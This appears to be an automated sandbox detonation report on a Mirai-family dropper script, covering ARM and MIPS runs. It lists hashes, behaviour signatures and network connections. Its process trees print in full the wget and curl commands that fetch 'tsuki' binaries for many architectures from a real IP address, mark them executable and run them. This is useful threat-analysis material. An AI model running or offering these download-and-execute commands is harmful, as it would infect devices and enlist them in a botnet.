SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-armhf-20240611-en

Max time kernel

21s

Max time network

23s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-eBfre8 tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-mipsbe-20240611-en

Max time kernel

55s

Max time network

58s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh systemd-private-363a19d03e6844c99088f60477a6604c-systemd-timedated.service-8UaazM tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846